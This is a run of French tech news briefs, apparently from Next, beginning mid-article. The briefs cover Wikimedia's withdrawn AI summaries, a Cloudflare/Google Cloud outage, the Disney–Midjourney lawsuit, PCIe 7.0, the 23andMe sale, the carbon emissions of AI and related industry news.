« S’appuyant sur une assise financière solide, le Groupe LDLC se positionne ainsi favorablement pour bénéficier pleinement du prochain cycle de croissance, permettant le retour à des niveaux de rentabilité normatifs », espère l’entreprise sans toutefois avancer de perspectives chiffrées pour le nouvel exercice en cours. En attendant, elle devrait continuer à faire le dos rond.

Wikipéd-IA

La fondation Wikimedia a mis en place une fonctionnalité expérimentale de résumé automatique des articles de l’encyclopédie qui s’affichait en tête de page dans la version mobile. Les wikipédiens n’ont pas apprécié et l’ont fait comprendre à la fondation, qui a finalement fait marche arrière avant la fin de la période de tests prévue.

Le 2 juin dernier, la fondation Wikimedia a annoncé aux communautés qui participent à l’édition de Wikipédia la mise en place d’une fonctionnalité utilisant l’IA générative : des résumés en haut des pages de l’encyclopédie. De « simples résumés pour les lecteurs générés par la machine, mais modérés par des éditeurs », expliquait la fondation.

« Ces résumés reprennent le texte existant de Wikipédia et le simplifient pour les lecteurs intéressés. Les lecteurs manifesteront leur intérêt en choisissant cette fonctionnalité et en cliquant pour ouvrir le résumé sur les pages où il est disponible », précisait-elle.

Cette expérimentation a été mise en place sur la version mobile de l’encyclopédie et devait concerner « un petit groupe (10 %) de lecteurs acceptant et ouvrant des résumés pré-générés sur un ensemble d’articles pendant deux semaines ». Un badge « non-vérifié » était même accolé en haut du texte.

De rudes critiques sur le principe même

Mais la fondation a dû l’écourter. Comme l’indique 404 Media, la communauté n’a pas apprécié le principe même de cette fonctionnalité. « Beurk » ont répondu certains. « Ce n’est pas parce que Google a déployé ses résumés IA que nous devons les surpasser », rétorque un autre : « je vous prie sincèrement de ne pas tester ça, ni sur mobile ni ailleurs. Cela porterait un préjudice immédiat et irréversible à nos lecteurs et à notre réputation de source digne de confiance et sérieuse ». D’autres affirment que c’est une « très mauvaise idée » ou s’y disent « opposés le plus fortement possible ».

La fondation n’a pas lancé ce projet en secret puisqu’une page lui était consacrée depuis janvier dernier sur son site dédié à la communauté MediaWiki. Cette page explique d’ailleurs que l’idée vient de discussions menées en aout 2024 lors de la conférence Wikimania de la fondation. Mais la communication envers la communauté à propos de ce projet semble ne pas avoir atteint sa cible avant qu’il soit mis en place.

Suite aux réactions, la fondation a lancé un sondage critiqué par la communauté pour son manque de transparence et ses résultats qui ne sont pas publics.

Une expérimentation en contradiction avec une recommandation de la communauté francophone

Du côté francophone, ça réagit aussi suite à la publication de l’article de 404 Media. « Les IA génératives peuvent s’avérer utiles pour reformuler ou synthétiser une proposition de RI [résumé introductif] préparé au préalable par un(e) honorable homo wikipedianus, mais je doute que cela puisse remplacer le RI lui-même », écrit une des bénévoles. Et d’ajouter : « Ce serait contraire à une « utilisation raisonnée » de l’IA telle que définit dans la nouvelle recommandation qui a été votée par la communauté, surtout sans vérification préalable ».

Et effectivement, en parallèle de cette expérimentation et sans aucun lien avec elle, la communauté de Wikipédia en français a voté très majoritairement pour un texte de recommandation sur l’usage de l’IA générative. Le résumé (non généré par IA) de ce texte affirme que « l’intelligence artificielle générative (IAg) n’apporte aucune garantie sur la fiabilité, la libre réutilisation et la vérifiabilité du contenu. Son utilisation est donc vivement déconseillée ».

Jules*, l’un des administrateurs de Wikipédia en français (qui a contribué à notre enquête sur les sites d’information générés par IA, ndlr), est aussi très critique de l’expérimentation mise en place par la fondation : « Je ne vois pas en quoi c’est un avantage. L’utilisateur pressé qui ne lit que le RI lira un RI généré par IA qui contient peut-être des hallucinations, des contre-sens, des imprécisions, qui ne restitue pas fidèlement le contenu de l’article, etc. C’est désastreux ».

• [Récap] Nous avons découvert des milliers de sites d’info générés par IA : tous nos articles

La fondation admet un raté dans la communication avec les bénévoles

« Cette expérience, d’une durée de deux semaines, visait à rendre les articles complexes de Wikipédia plus accessibles aux personnes ayant des niveaux de lecture différents », a déclaré la fondation à 404 Media.

Elle précise que, « pour les besoins de cette expérience, les résumés ont été générés par un modèle Aya à poids ouvert de Cohere. L’objectif était de mesurer l’intérêt pour une telle fonctionnalité et de nous aider à réfléchir au type de système de modération communautaire adéquat pour garantir que les humains restent au centre des décisions concernant les informations affichées sur Wikipédia ».

Un responsable de projet de la fondation admet aussi auprès de nos confrères que la fondation aurait pu faire mieux en ouvrant la conversation sur le sujet sur le « village pump technical », l’endroit où sont discutés les sujets techniques en lien avec l’encyclopédie.

« Nous ne prévoyons pas d’introduire une fonction de résumé dans les wikis sans la participation des éditeurs. Un processus de modération par l’éditeur est nécessaire en toutes circonstances, à la fois pour cette idée et pour toute autre idée future concernant le contenu résumé ou adapté par l’IA », ajoute-t-il.

Belle illustration de l’effet domino : jeudi soir, bon nombre de services populaires, de Spotify à Discord en passant par Gmail se sont trouvés très ralentis, voire totalement inaccessibles.

L’attention s’est d’abord portée vers Cloudflare, qui sert d’intermédiaire technique à la distribution de la plupart de ces sites et applications. L’entreprise américaine a en effet déclaré à 20h19 l’ouverture d’un incident entraînant des répercussions sur ses outils d’authentification, mais aussi sur la connectivité de ses services.

À 21 heures, Cloudflare parle de dysfonctionnements « intermittents », mais précise que ces derniers affectent les principaux composants de son infrastructure. À ce stade, la cause de la panne n’est pas encore publiquement identifiée.

Une heure plus tard, l’entreprise donne enfin une piste : « Le service critique Workers KV de Cloudflare a été mis hors ligne en raison d’une panne d’un service tiers essentiel. Par conséquent, certains produits Cloudflare qui s’appuient sur le service KV pour stocker et diffuser des informations sont indisponibles ».

Workers KV, c’est le service de stockage par l’intermédiaire duquel Cloudflare assure la réplication et la distribution au plus près des clients des contenus que l’entreprise distribue. Or ce service repose sur l’infrastructure d’un partenaire.

En l’occurrence, Google Cloud Platform, qui a lui aussi fait état d’un incident majeur jeudi soir, déclaré d’ailleurs jeudi à 20h46 heure française, soit après que Cloudflare a ouvert son propre ticket.

Le rapport d’incident de Google détaille le calendrier de la résolution du problème et la remise en service progressive des différents composants de GCP, mais il ne précise pas, à ce stade, les causes de la panne. Outre Cloudflare et ses clients, elle a par ailleurs directement affecté les services, grand public ou entreprise, de Google, comme en témoigne cet incident recensé au niveau des outils composants Workspace.

« Tous les services sont entièrement rétablis suite au problème. Nous publierons une analyse de cet incident une fois notre enquête interne terminée », a conclu Google, vendredi à 3h37.

Cloudflare a de son côté publié un post mortem détaillé, qui revient sur le déroulé exact de l’incident, et la façon dont les dysfonctionnements se sont propagés au sein de son infrastructure. L’éditeur y endosse sa part de responsabilité, avec des excuses qui illustrent bien les problématiques de centralisation des réseaux.

« Nous sommes profondément désolés pour cette panne : il s’agit d’une défaillance de notre part, et bien que la cause immédiate (ou le déclencheur) de cette panne soit une défaillance d’un fournisseur tiers, nous sommes en fin de compte responsables de nos dépendances choisies et de la manière dont nous choisissons de nous architecturer autour d’elles. »

Il aurait dû porter le numéro 1047, avec une Une consacrée à la cyberguerre. Il ne paraîtra finalement pas, a annoncé jeudi Jean-Marie Portal, son rédacteur en chef depuis 2020.

« Le rideau est tombé sur 01NET magazine. Liquidation judiciaire. Fin brutale. La couverture que vous voyez ici ne paraîtra jamais. Tout était prêt. Le sommaire. Les textes. Le dossier de une. Il ne manquait que l’imprimeur. », écrit-il.

La société éditrice du célèbre quinzomadaire dédié à l’informatique grand public, 01 Net Mag SAS, a en effet été placée en liquidation judiciaire le 22 mai dernier, signale une annonce légale datée du 8 juin.

« J’y ai été rédacteur en chef. Et j’en suis fier. Fier d’avoir réinventé le sommaire, lancé de nouvelles rubriques, défendu un journalisme grand public qui ne prend pas ses lecteurs pour des idiots – ni ses sujets pour des vitrines de com’ », revendique Jean-Marie Portal, dans un message qui remercie ses collègues, les professionnels du secteur, mais aussi les propriétaires du magazine, racheté à Altice Media en 2019 par un repreneur dont le profil ne sonnait pas comme une évidence. « Sans eux, l’aventure se serait arrêtée bien plus tôt. »

Rappelons que le magazine 01net est issu du rapprochement entre l’Ordinateur individuel-SVM et Micro Hebdo. Le site 01net.com, resté plus longtemps dans le giron du groupe Altice, est quant à lui la propriété du groupe Keleops, qui détient également les sites Presse-Citron, Journal du Geek, ainsi que Gizmodo depuis juin 2024.

4,6 euros par heure si l’on s’attache au temps de disponibilité, 11,6 euros par heure si l’on s’attache au travail effectif.

Vincent Mongaillard, journaliste au Parisien, s’est glissé dans la peau d’un livreur Uber Eats pendant trois semaines, et sa conclusion est claire : difficile de gagner l’équivalent du Smic net (9,40 euros de l’heure) dans cette profession qui réunit tout de même 65 000 personnes au statut d’autoentrepreneur. Entre 2021 et 2024, les revenus horaires bruts auraient chuté de plus de 34 % chez Uber Eats, en comptant l’inflation.

Chaque jour ou presque, il se voit demander de présenter sa carte d’identité ou d’enregistrer un selfie, une manière pour l’opérateur de lutter contre l’usurpation ou la sous-location de compte. Devant la chute de revenus, pourtant, la population des livreurs a nettement évolué : un récent rapport de l’Anses relevait que les travailleurs sans-papiers y étaient désormais surreprésentés.

Quant aux commandes, elles varient en termes de distance – l’expérience fera refuser au journaliste une épopée de Saint-Michel, au cœur de Paris, jusqu’à Nanterre au nord-ouest –, de contenus – dont ce lot de sacs poubelles demandés dans le XVIe un premier mai –, comme de temps d’attente.

Parmi les points de frustration les plus remontés par les livreurs, et expérimentés par le journaliste : le renversement des boissons, qui viennent inonder plus d’une fois les commandes.

Malgré l’aspect aléatoire des réceptions de commande, qui provoquent parfois le sentiment d’être utile, à d’autres moments, celui d’être persona non grata, « le plus dur, quand on est livreur, c’est de savoir s’arrêter », écrit le journaliste.

De la même manière qu’Uber a utilisé des techniques issues des jeux vidéos pour pousser ses chauffeurs à conduire plus, on sent le livreur tenté de faire toujours une livraison supplémentaire, dans l’espoir d’augmenter ses gains.

Du côté de la clientèle, explique le sociologue Fabien Lemozy, la facilité d’usage des applications de livraison a un autre effet secondaire : celui de créer des « rapports de domesticité » avec les travailleurs précaires.

Elle l’avait annoncée il y a quelques mois, la consultation est désormais ouverte : la CNIL appelle tous les acteurs publics et privés concernés par les enjeux relatifs aux pixels de tracking à lui soumettre leurs contributions d’ici au 24 juillet 2025.

Alternative aux cookies, les pixels de suivi, tracking pixels en anglais, sont intégrés dans les sites web ou les courriels pour permettre de savoir qu’un internaute a visité une page web ou ouvert l’e-mail qui lui a été envoyé, mesurer les audiences, personnaliser des échanges, etc.

Si leur usage est ancien, il s’est accru ces dernières années, au point que la Commission indique recevoir « un nombre croissant de signalements et de plaintes, qui témoignent d’une plus grande vigilance des personnes sur ces pratiques ».

Avec cette consultation, dont le périmètre se concentre sur les pixels utilisés dans les courriers électroniques, la CNIL indique vouloir collecter les avis des acteurs directement visés par le projet de recommandation qu’elle met à disposition – un questionnaire est notamment dédié aux impacts économiques directs et indirects de son projet de texte –, ainsi que les citoyens et la société civile.

Le but : préciser les cas dans lesquels le recueil de consentement est nécessaire de ceux dans lesquels il peut être exempté.

Faut-il utiliser l’intelligence artificielle lorsqu’on code au quotidien ? Dans quelle mesure ? À ces questions que nous posions une nouvelle fois dans un article récent, Canva répond désormais de manière très tranchée : utilisez l’IA, y compris lors des tests techniques de vos entretiens d’embauche. 


Dans un article de blog, le directeur data science de la société déclare que Canva attend désormais des ingénieurs frontend, backend et Machine learning qui postulent chez elle qu’ils utilisent des outils comme Copilot, Cursor ou Claude lors des entretiens techniques de recrutement.

Simon Newton indique que près de la moitié des programmeurs backend et frontend utilisent déjà ce type d’outils, que ce soit pour « prototyper des idées, comprendre notre vaste base de code ou générer du nouveau code ».

Constatant par ailleurs que des candidats utilisaient déjà des outils d’IA de manière plus ou moins assumée lors des entretiens, l’entreprise a indiqué se pencher sur le sujet.


Après avoir constaté que les outils de code augmenté permettaient de répondre à des questions techniques généralement posées en entretien, « nous avons dû repenser la manière dont nous approchions les entretiens techniques », écrit Simon Newton. 


L’entreprise indique donc les avoir fait évoluer de manière à comprendre la manière dont développeuses et développeurs interagissent avec ces machines, la manière dont ils divisent une problématique complexe pour la résoudre à l’aide d’IA, ou encore la mesure dans laquelle les candidats repèrent les erreurs générées par les LLM.

Hollywood contre-attaque

La plainte des deux studios est la première engageant la bataille entre Hollywood et les entreprises d’IA générative. Disney et Universal poursuivent Midjourney pour infractions directes et indirectes au copyright.

Mercredi 10 juin, les deux studios hollywoodiens ont déposé plainte contre Midjourney. Alors que les entreprises d’IA générative étaient jusque-là plutôt attaquées par des éditeurs de livres ou de médias comme le New York Times, cette plainte les fait entrer dans une autre dimension.

« Le site de Midjourney affiche des centaines, voire des milliers, d’images générées par son service d’images à la demande de ses abonnés qui portent atteinte aux droits des plaignants », affirme les deux studios dans leur plainte [PDF] repérée par Variety.

En janvier 2024, Next montrait déjà que Midjourney recrache des images Pixar et d’œuvres protégées, parfois sans qu’on le lui demande. Midjourney nous avait proposé des images de trois personnages dont les droits appartiennent à Disney et aux studios Pixar (propriété de Disney) : Wall-E et Woody et Buzz l’Éclair de Toy Story. Évidemment, les studios hollywoodiens l’ont, eux aussi, repéré.

De Hulk à la princesse Elsa en passant par les Simpsons

Après plus d’un an et demi à fourbir leurs armes juridiques, Disney et Universal ont donc déposé plainte. Dans le document, on peut voir des comparaisons d’images entre ce qui est généré par l’outil de MidJourney et des extraits de différents films. Notamment, on peut y voir des personnages de l’univers Marvel (racheté par Disney) comme Deadpool et Wolverine, Iron Man, Spider-Man, Hulk. Mais aussi des images dérivées de la saga Star Wars avec Darth Vader, Yoda, R2-D2, C-3PO et Chewbacca. Des personnages de dessins animés Disney comme la princesse Elsa et Olaf, Simba du Roi Lion, les Simpson (dans le giron de Pixar) ou Buzz l’éclair. Des images de la franchise Dragons de DreamWorks (propriété d’Universal), de Shrek d’Universal et des Minions d’Illumination (racheté par Universal) font aussi partie du lot.

« Le comportement de Midjourney détourne la propriété intellectuelle de Disney et d’Universal et menace de bouleverser les incitations fondamentales de la loi américaine sur le Copyright, qui sont à la base du leadership américain dans les domaines du cinéma, de la télévision et d’autres arts créatifs », affirme la plainte.

Contrefaçon « calculée et délibérée »

« La contrefaçon de Midjourney est calculée et délibérée », affirment même les deux studios. « Les plaignants ont demandé à Midjourney de cesser de violer le copyright de leurs œuvres et, au minimum, d’adopter des mesures technologiques, que d’autres services d’IA ont mises en œuvre pour empêcher la génération de matériel contrefait », ajoutent-ils.

Rappelons quand même que Midjourney n’est pas la seule entreprise d’IA générative à jouer ce petit jeu. OpenAI s’est, par exemple, servi massivement du style du réalisateur anti-IA Miyazaki pour la promotion de ses modèles.

• Demander la permission des artistes « tuerait » l’industrie de l’IA, pour Nick Clegg

Les deux studios hollywoodiens affirment que « Midjourney, qui a attiré des millions d’abonnés et a gagné 300 millions de dollars rien que l’année dernière, se concentre sur ses propres résultats et ignore les demandes des plaignants ». Disney et Universal ont envoyé des mises en demeure à l’entreprise d’IA générative mais n’ont reçu aucune réponse.

Ils demandent des dommages-intérêts sans pour autant en spécifier le montant, mais aussi une « injonction préliminaire et/ou permanente » empêchant Midjourney de violer ou de distribuer leurs œuvres copyrightées.

« Nous sommes convaincus des promesses de la technologie de l’intelligence artificielle et optimistes quant à la façon dont elle peut être utilisée de manière responsable en tant qu’outil pour faire progresser la créativité humaine », a déclaré Horacio Gutierrez, directeur juridique de Disney, au New York Times, ajoutant « mais le piratage reste le piratage, et le fait qu’il soit effectué par une société d’IA ne le rend pas moins contrefaisant ».

Son prix public conseillé de 469 euros n’a manifestement pas tempéré l’enthousiasme des premiers fans : dans un communiqué daté du 11 juin, Nintendo s’est en effet félicité que sa nouvelle console, la Switch 2, ait enregistré un démarrage record, avec 3,5 millions d’exemplaires écoulés en quatre jours.

« Il s’agit du niveau de ventes mondiales le plus élevé jamais enregistré pour un appareil Nintendo au cours des quatre premiers jours », commente l’entreprise, qui fait probablement preuve d’une modestie excessive. Ces chiffres de lancement correspondent en effet à un record de marché, tout constructeur confondu, comme le rappelle sur Bluesky le journaliste Oscar Lemaire(de ludostrie.com, ex Gamekult).

À titre de comparaison, la première Switch, sortie en 2017, avait de son côté enregistré 2,7 millions de ventes lors de son premier mois de commercialisation, tandis qu’il avait fallu 1,5 mois à Sony pour aligner 4,5 millions de PS5 fin 2020, sur fond toutefois de grandes difficultés d’approvisionnement sur le marché des composants.

En France, les quatre premiers jours de commercialisation se traduiraient par 169 000 ventes d’après les chiffres compilés par Oscar Lemaire, ce qui constitue là encore un record.

169 000 ventes pour le lancement de la Switch 2 en France. Le précédent record pour le lancement d'une console était la PS5 avec 107k.

[image or embed]

— Oscar Lemaire (@oscarlemaire.bsky.social) 10 juin 2025 à 20:29

Ce succès dépasserait-il les attentes de Nintendo ? Dans sa communication financière, le constructeur japonais avançait, début mai, un objectif de 15 millions de Switch 2 vendues sur l’ensemble de son exercice.

Des Go/s comme s’il en pleuvait

Ces derniers jours, plusieurs annonces ont été faites du côté de l’interconnexion. L’Ultra Ethernet passe en version finale après des mois de développement, comme le PCIe 7.0 qui double les débits par rapport au PCIe 6.0. Enfin, le PCI-SIG annonce le PCIe Optical Interconnect Solution pour du PCIe via des fibres optiques.

L’Ultra Ethernet, cela fait plus d’un an déjà qu’on en a parlé sur Next. Ce protocole est développé par l’Ultra Ethernet Consortium, ou UEC. Le but n’est pas de « remanier Ethernet », mais de « régler » ce protocole afin d’« améliorer l’efficacité des charges de travail ayant des exigences de performances spécifiques ».

L’Ultra Ethernet débarque en version finale

Ultra Ethernet se pose pour rappel en concurrent de l’Infiniband de NVIDIA. « Malgré le succès de la sémantique RDMA (Remote Direct Memory Access) issue du monde Infiniband et portée vers Ethernet au travers du protocole RoCE (RDMA over Converged Ethernet), il reste des limitations de passage à l’échelle de RoCE que l’Ultra Ethernet Consortium va résoudre », nous expliquait Rémy Gauguey, data center software architect chez Kalray et ancien du CEA.

• L’Ultra Ethernet se prépare

L’Ultra Ethernet passe « une étape cruciale » cette semaine avec la mise en ligne de la version 1.0 de ses caractéristiques techniques. S’il en est besoin, le consortium précise que le but est de répondre aux besoins « modernes » que sont les systèmes pour l’intelligence artificielle et le calcul haute performance.

Le consortium précise que ce standard est ouvert et interopérable afin d’éviter un « verrouillage des fournisseurs ». Le PDF de 562 pages des caractéristiques d’Ultra Ethernet est librement téléchargeable, ainsi qu’un livre blanc. Une vidéo de présentation a aussi été mise en ligne.

Dans les membres du comité directeur, on retrouve AMD, Arista, Broadcom, Cisco, Eviden, HPE, Intel, Meta, Microsoft et Oracle. La liste des membres de manière générale est plus longue avec Google Cloud, NVIDIA, Qualcomm, Synopsys, Marvell…

PCIe 7.0 en version finale (PCIe 8.0 en embuscade)

De son côté, le PCI-SIG en charge du PCI Express annonce la version finale du PCIe 7.0 (dont les détails sont limités à ses membres). Rien de surprenant puisque les brouillons se sont enchainés ces derniers mois. Comme le veut la tradition, chaque nouvelle version est l’occasion de doubler les débits théoriques.

Le PCIe 7.0 peut ainsi atteindre jusqu’à 256 Go/s en x16 (16 lignes, le maximum possible) dans un sens et donc 512 Go/s en x16 en bi-directionnel. Côté technique, le PCIe 7.0 reste en PAM 4 (modulation d’amplitude d’impulsion sur quatre niveaux) avec « une faible latence et une haute fiabilité », tout en améliorant « l’efficacité énergétique », selon le PCI-SIG. Une foire aux questions est disponible par ici.

Les cibles sont, sans surprise, multiples : IA, machine learning, HPC, cloud et datacenters ; bref, les poncifs du moment. « Même avec la popularité et l’attention qui ont été consacrées au déploiement de PCIe 6.0, la spécification PCIe 7.0 suscite plus d’enthousiasme que n’importe quelle version précédente », affirme le consortium.

Pour rappel, les dernières cartes graphiques d’AMD et NVIDIA sont en PCIe 5.0 pour le moment.

Lors de la PCI-SIG DevCon de ce mois de juin, le consortium a annoncé travailler sur le PCIe 8.0… ce qui ne surprendra personne. Aucun détail n’est donné pour le moment.

Voici pour rappel les évolutions des 22 dernières années (en bi-directionnel) :

• PCIe 1.0 (2003) : jusqu’à 8 Go/s en x16
• PCIe 2.0 (2007) : jusqu’à 16 Go/s en x16
• PCIe 3.0 (2010) : jusqu’à 32 Go/s en x16
• PCIe 4.0 (2017) : jusqu’à 64 Go/s en x16
• PCIe 5.0 (2019) : jusqu’à 128 Go/s en x16
• PCIe 6.0 (2022) : jusqu’à 256 Go/s en x16
• PCIe 7.0 (2025) : jusqu’à 512 Go/s en x16

Le PCIe passe à l’optique

Le PCI-SIG annonce aussi le PCIe Optical Interconnect Solution. Il s’intègre dans les versions 6.4 et 7.0 du PCIe et devient « la première solution optique PCIe ». Le consortium ne veut pas se limiter à un type de fibre et affirme que sa technologie peut fonctionner « de manière transparente sur diverses technologies optiques ».

Cette technologie a déjà fait l’objet de démonstrations par le passé, notamment chez Synopsys. Le PCI-SIG avait de son côté annoncé des travaux d’exploration en août 2023.

L’entreprise américaine de biotech Regeneron a annoncé avoir rachetée l’entreprise d’analyse génétique il y a tout juste un mois. Mais 23andMe va devoir livrer une dernière bataille juridique : celle de la vente des données génétiques qu’elle a amassées. La justice étasunienne doit encore valider l’acte. Regeneron a acheté 23andMe aux enchères pour 256 millions de dollars.

C’est l’énorme base de données d’échantillons d’ADN qui justifie ce montant. L’entreprise pharmaceutique a précisé qu’elle allait donner la priorité à l’utilisation éthique des données ADN des clients qui ont recouru à 23andMe pour des tests d’ascendance et d’autres services.

Mais 28 procureurs généraux étasuniens voient d’un mauvais œil cette vente des données génétiques des clients de 23andMe sans leur consentement. Comme l’indique le New York Times, ils ont porté plainte [PDF] contre l’entreprise et posent « la question de savoir si les débiteurs ont le droit de le vendre et de transférer [le matériel génétique et les données liées] à tout acheteur sans avoir obtenu au préalable le consentement exprès et éclairé de chaque client ».

« Il ne s’agit pas seulement de données, mais de votre ADN. C’est personnel, permanent et profondément privé », rappelle Dan Rayfield, procureur général de l’Oregon cité par le New York Times. « Les gens n’ont pas soumis leurs données personnelles à 23andMe en pensant que leur empreinte génétique serait ensuite vendue au plus offrant », ajoute-t-il.

Sur X, Dan Rayfield partage aussi un guide expliquant aux anciens clients comment demander à 23andMe de supprimer leurs données.

De son côté, l’entreprise a affirmé qu’ 1,9 million de personnes, soit 15 % de ses utilisateurs ont demandé la suppression de leurs données génétiques depuis que l’entreprise a annoncé sa faillite, explique TechCrunch. Mais cette démarche passe par une demande des utilisateurs alors que les 28 procureurs généraux étasuniens penchent, au contraire, pour que 23andMe demande le consentement explicite de la vente de leurs données à toutes les personnes concernées.

La justice étasunienne doit se prononcer courant juin sur la vente de 23andMe à Regeneron.

Nouvelle mouture pour l’utilitaire, qui sert pour rappel à créer des médias d’installation pour différents systèmes, Windows tout particulièrement.

Cette version 4.8 apporte un changement important en basculant sur wimlib. Cette bibliothèque, open source et multiplateforme, est spécialisée dans la manipulation des images WIM. Microsoft s’en sert par exemple pour sa propre image d’installation de Windows, elle-même au format ISO. Si la clé USB utilisée est décemment récente, les utilisateurs devraient constater une nette amélioration dans l’ouverture des images Windows, surtout dans la création de lecteurs Windows To Go.

Dans les notes de version, on peut lire aussi que Rufus est passé à des binaires Visual Studio partout à cause de certaines limitations avec MinGW, l’ajout d’exceptions pour certaines distributions Linux se limitant au mode de formatage DD (comme openSuse et Nobara), l’amélioration des rapports sur les bootloaders UEFI ainsi que quelques corrections de bugs.

L’éditeur est surtout connu pour avoir tenté de réinventer le navigateur avec Arc. Le produit avait ses aficionados, mais Josh Miller, CEO de The Browser Company, a fini par annoncer fin mai qu’Arc allait être abandonné, car il n’avait pas rencontré de public assez large. Dans un billet, l’éditeur expliquait que bon nombre de leçons avaient été apprises – dont une courbe d’apprentissage trop exigeante – et qu’il allait en tirer parti dans son autre projet.

Cet autre projet, c’est Dia, désormais disponible en bêta privée. La priorité est donnée aux utilisateurs d’Arc, qui pourront inviter d’autres personnes s’ils le souhaitent. On peut également s’inscrire sur une liste d’attente pour recevoir une clé.

Il faut donc se contenter pour l’instant de la présentation de Dia sur son site dédié. On peut voir que le navigateur fait effectivement la part belle à l’IA, avec une page d’accueil centrée sur les requêtes. On peut s’en servir pour effectuer des tâches que l’on peut presque considérer comme courantes désormais : lancer une requête sur un sujet, interroger le navigateur sur les onglets ouverts, poser des questions générales, résumer les fichiers téléchargés, rédiger un brouillon à partir d’un onglet, etc.

Dia est également équipé de fonctions plus spécifiques. Par exemple, History autorise le navigateur à puiser dans l’historique des sept derniers jours pour y trouver du contexte. Les SKills permettent de créer des raccourcis vers des paramètres ou pour effectuer des actions, par exemple pour créer une mise en page spécifique sur un site. On peut également relier des conditions et des actions, à la manière des Raccourcis sur les plateformes Apple.

Mais, comme le rappelle TechCrunch, Dia n’est pas le seul navigateur à s’être lancé à cœur perdu dans l’IA générative. Opera a lancé son propre Neon (là aussi en bêta privée) et avait dégainé le premier des fonctions liées, notamment via des agents pour effectuer diverses tâches, jusqu’à créer de petites applications. Les grands navigateurs historiques n’ont pas encore basculé, mais ils ajoutent par petites touches des fonctions dopées à l’IA, parfois via d’autres composants. Les acteurs de l’IA aimeraient également leur propre navigateur, comme on l’a vu en avril avec OpenAI et Perplexity, qui se disaient prêts à racheter Chrome.

Dans un communiqué, la Commission européenne explique que, suite à son enquête, elle est arrivée à la conclusion que « le projet d’acquisition ne poserait aucun problème de concurrence au sein de l’EEE et a autorisé l’opération sans condition ».

L’année dernière, SES avait fait part de son projet d’acquisition d’Intelsat pour un montant de 2,8 milliards d’euros. Il y a quelques jours, l’Autorité de la concurrence britannique avait aussi donné son feu vert.

Dans son communiqué, elle rappelle que « SES et Intelsat sont toutes deux des opérateurs mondiaux de réseaux satellitaires qui possèdent et exploitent des satellites en orbite terrestre géostationnaire («GEO»). Bien que les deux entreprises aient leur siège social au Luxembourg et soient actives dans l’EEE, les activités principales et le siège administratif d’Intelsat sont situés aux États-Unis ». SES et Intelsat veulent ainsi concurrencer d’autres solutions comme celles de SpaceX (Starlink) et Amazon (Kuiper).

La balle est maintenant dans le camp des États-Unis qui doivent aussi se prononcer sur cette opération.

Tout va bien

Un rapport de l’ONU pointe la soudaine hausse des émissions indirectes de CO2 des géants du numérique comme Amazon, Microsoft, Google et Meta. Entre 2020 et 2023, la moyenne des augmentations des émissions dont ils sont responsables est de 50 %, dues notamment à la mise en place intensive de l’IA générative.

Les émissions indirectes de CO2 liées aux activités de quatre des plus importantes entreprises du numérique qui ont investi massivement dans l’IA ont augmenté en moyenne de + 50 % entre 2020 et 2023, indique un rapport [PDF] publié par l’Union internationale des télécommunications (UIT), l’agence de l’ONU spécialisée dans les questions de numérique.

+ 82 % d’émission pour Amazon

Selon le rapport, ce sont les émissions de carbone d’Amazon qui ont le plus augmenté (+ 82 % en 2023 par rapport à 2020), suivies de celles de Microsoft (+ 55 %), de Meta (+ 45 %) et d’Alphabet (+ 38 %).

L’UIT ajoute que les 14 plus grandes entreprises de télécommunications (dont Orange, Verizon, AT&T, mais aussi China Mobile, China Telecom et China Unicom) n’ont pas connu d’augmentation au cours de la même période, « bien que l’IA soit susceptible d’être intégrée dans leurs logiciels ». Leur moyenne suit même une très légère baisse.

Il sera intéressant de suivre l’évolution de ces chiffres sur les années suivantes, puisque les années 2020 - 2023 sont en partie des années de R&D des premières solutions d’IA génératives. On peut faire l’hypothèse que les entreprises de télécoms ont mis en place plus tardivement de telles solutions que les entreprises leaders du secteur de l’IA.

102,6 millions de tCO2e par an pour les systèmes les plus émetteurs

Pour appuyer son propos, le rapport fait référence à une étude récente qui estime que les émissions de carbone provenant des systèmes d’IA les plus émetteurs pourraient atteindre 102,6 millions de tCO2e (voir équivalent CO2) par an. « Compte tenu de l’omniprésence de l’IA et de son intégration croissante dans divers services, il est difficile d’estimer l’impact direct de son utilisation », explique l’UIT.

Comme déjà évoqué, l’agence insiste sur la difficulté à estimer l’évolution des émissions des IA : « les données des datacenters d’IA peuvent être faciles à suivre, mais un algorithme basé sur l’IA dans une fonction de réseau spécifique serait difficile à définir et à suivre séparément ». L’organisation déplore qu’ « actuellement, il n’existe pas de normes ou d’exigences législatives imposant aux entreprises de divulguer leurs émissions d’IA ou leur consommation d’énergie, ce qui rend la compréhension de l’impact de l’IA sur la consommation d’énergie au niveau de l’entreprise moins évidente. ».

« L’IA n’est pas seulement avide de données mais aussi d’énergie et, à mesure que l’expansion de l’IA se poursuit, l’augmentation de la demande d’énergie pourrait exercer une pression sur l’infrastructure énergétique existante et compromettre l’objectif de transition énergétique », commente l’agence.

On peut cependant remarquer, que sur le graphique de l’UIT ci-dessus, l’augmentation de la consommation d’énergie des quatre géants du numérique semble se concentrer sur les années 2020 - 2022. Cette forte inflexion peut laisser espérer une stabilisation de la consommation. Des données sur les années suivantes seront intéressantes à observer.

Remarquons que les chiffres évoqués par l’UIT ne sont pas exactement les mêmes que ce que nous avions repéré l’année dernière. Dans son rapport, Microsoft évoquait plutôt une augmentation de 29 % entre 2020 et 2023. De son côté, Google évoquait une augmentation de 48 % pour la période 2019 – 2023. L’UIT évoque pourtant les rapports des entreprises comme sources. Ce flou plaide toutefois pour la mise en place de normes ou d’exigences législatives, comme l’évoque l’agence de l’ONU.

À Taïwan, des travailleuses et travailleurs immigrés dénoncent les conditions de travail auxquels ils et elles sont soumis dans les usines de semi-conducteurs qui alimentent les produits Nvidia, Apple, Tesla, et d’autres marques de l’industrie numérique. 


Venue des Philippines, l’une d’elles raconte à Rest of World être arrivée pleine d’espoir à Taipei, pour se voir rapidement embarquée dans un van, installée dans un dortoir qu’elle devait partager avec trois personnes, puis forcée à enchaîner des journées de 12 heures jusqu’à sa démission.

Le nombre de personnes venues des Philippines pour alimenter les lignes de production de semi-conducteurs taïwanais explose depuis 2023. Elles représentent désormais 10 % des arrivées dans le pays, calcule le média. En 10 ans, leur part dans l’industrie des semi-conducteurs a augmenté de 50 %. Pour autant, cette population migrante est victime de discrimination, d’après plusieurs experts et témoignages de terrain.

Auprès de Rest of World, 20 d’entre eux décrivent des obligations à travailler plus longtemps et pour des salaires plus faibles que leurs collègues taïwanais. En cas de typhon, les travailleuses et travailleurs originaires de l’île ont l’autorisation de rentrer chez eux, tandis que les personnes immigrées doivent continuer de travailler, selon le représentant de l’ONG Migrante Taiwan. À défaut, elles risquent de perdre leur emploi.

